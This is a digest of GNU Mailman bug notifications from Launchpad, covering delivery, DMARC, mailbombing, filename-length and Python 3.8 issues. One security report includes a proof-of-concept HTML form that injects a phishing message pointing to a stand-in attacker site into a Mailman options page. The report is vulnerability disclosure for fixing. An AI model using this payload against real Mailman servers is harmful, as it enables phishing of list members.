Public bug reported:
Setting localhost in postfix_lmtp works against Postfix defaults and
breaks delivery.
Reason: The Postfix lmtp client only uses dns queries by default to
search for hostnames. If the DNS server does not provide an answer for
"localhost" delivery from the lmtp client to mailman fails.
Solution: Provide "127.0.0.1" instead of "localhost". This does not
require DNS and is even faster because it saves DNS lookups.
Example:
hey2(a)mailman.state-of-mind.de
lmtp:[localhost.localdomain]:8024
** Affects: mailman
Importance: Undecided
Status: New
** Tags: 3.0 mailman
--
setting localhost in postfix_lmtp breaks delivery
https://bugs.launchpad.net/bugs/544477
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
Public bug reported:
Using Mailman 2.1.33. I noticed that occasionally, DMARC mitigations for
aol.com "From" addresses were not being applied.
I tracked us down to the fact that DNS records can in rare cases return
"AOL" in uppercase in the answer of the TXT record lookup. Here's an
example where I caught it happening:
$ dig _dmarc.aol.com TXT
[...]
;; QUESTION SECTION:
;_dmarc.aol.com. IN TXT
;; ANSWER SECTION:
_dmarc.AOL.com. 492 IN TXT "v=DMARC1; p=reject; pct=100; rua=mailto:d@rua.agari.com; ruf=mailto:d@ruf.agari.com;"
Note that we requested "_dmarc.aol.com" in the question section, but got back "_dmarc.AOL.com" in the answer section. That case mismatch makes this code in Mailman/Utils.py skip the record:
for name in want_names:
if name not in results_by_name:
continue
I believe the solution is to lowercase the result after the lookup.
Patch attached.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: dmarc
** Patch added: "Lowercase DMARC TXT record label in answer section"
https://bugs.launchpad.net/bugs/1881035/+attachment/5377571/+files/mailman-…
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1881035
Title:
DMARC mitigation fails if TXT record name contains uppercase
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1881035/+subscriptions
Public bug reported:
On a list with a private roster, an attempt to subscribe an address
which is already a member results in a warning notice sent to the target
address. To prevent wsing this to mailbomb a list member, there is a new
WARN_MEMBER_OF_SUBSCRIBE setting that can be set to No to suppress the
warning.
** Affects: mailman
Importance: Low
Assignee: Mark Sapiro (msapiro)
Status: Fix Committed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1883017
Title:
It is possible to mailbomb a member of a list with a private roster by
repeatedly posting the subscribe form.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1883017/+subscriptions
Public bug reported:
There is a report of this at https://mail.python.org/archives/list
/mailman-users(a)python.org/message/CMQGFVJ26IPKJPFHMFIW36ZEB6QMETY7/
While it is unusual, and only occurs with a non-default setting, there
should be no harm in truncating the name to < 255 characters.
** Affects: mailman
Importance: Low
Assignee: Mark Sapiro (msapiro)
Status: Fix Committed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1884456
Title:
When SCRUBBER_DONT_USE_ATTACHMENT_FILENAME is False, Scrubber can
create names too long.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1884456/+subscriptions
Public bug reported:
We are using GNU Mailman version 2.1.18-1. This morning one of our
administrators posted to our listserve as normal, but it was not
received. In the archives, it is showing as delivered. We have not had
any issues like this before. Suggestions on how to ensure that our
emails are being posted?
** Affects: mailman
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1885172
Title:
Administrator email not delivered
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1885172/+subscriptions
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/
exists at different endpoint & param. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker(a)badsite.com"
message will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions
Public bug reported:
In Ubuntu 20.04 LTS, it seems that Mailman3 package (3.2.2-1) is
incompatible with Python 3.8 which is used in 20.04.
How to reproduce:
try to subscribe a list through the web interface
https://.../mailman3/postorius/lists/.../
it returns an error and in /var/log/mailman3/mailman.log you will find:
Jun 08 17:35:57 2020 (6830) Uncaught runner exception: module 'time' has no attribute 'clock'
Jun 08 17:35:58 2020 (6830) Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 173, in _one_iteration
self._process_one_file(msg, msgdata)
File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 266, in _process_one_file
keepqueued = self._dispose(mlist, msg, msgdata)
File "/usr/lib/python3/dist-packages/mailman/runners/incoming.py", line 79, in _dispose
process(mlist, msg, msgdata, start_chain)
File "/usr/lib/python3/dist-packages/mailman/core/chains.py", line 79, in process
link.function(mlist, msg, msgdata)
File "/usr/lib/python3/dist-packages/mailman/chains/hold.py", line 147, in _process
request_id = hold_message(mlist, msg, msgdata, SEMISPACE.join(reasons))
File "/usr/lib/python3/dist-packages/mailman/app/moderator.py", line 88, in hold_message
request_id = requestsdb.hold_request(
File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper
return function(args[0], config.db.store, *args[1:], **kws)
File "/usr/lib/python3/dist-packages/mailman/model/requests.py", line 100, in hold_request
token = getUtility(IPendings).add(pendable, timedelta(days=5000))
File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper
return function(args[0], config.db.store, *args[1:], **kws)
File "/usr/lib/python3/dist-packages/mailman/model/pending.py", line 91, in add
token = token_factory.new()
File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 79, in new
return self._next_unpredictable_id()
File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 155, in _next_unpredictable_id
x = random.random() + right_now % 1.0 + time.clock() % 1.0
AttributeError: module 'time' has no attribute 'clock'
This bug has been already fixed in upstream: https://gitlab.com/mailman/mailman/-/commit/ea05bdd0f74ba06d85adad1f7d190a6…
Workaround:
patch the files /usr/lib/python3/dist-packages/mailman/ by hand and
restart mailman.
** Affects: mailman
Importance: Undecided
Status: New
** Affects: mailman3 (Ubuntu)
Importance: Undecided
Status: New
** Tags: mailman3
** Also affects: mailman3 (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1882660
Title:
Mailman and Python 3.8 incompatibility - unable to subscribe a list
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1882660/+subscriptions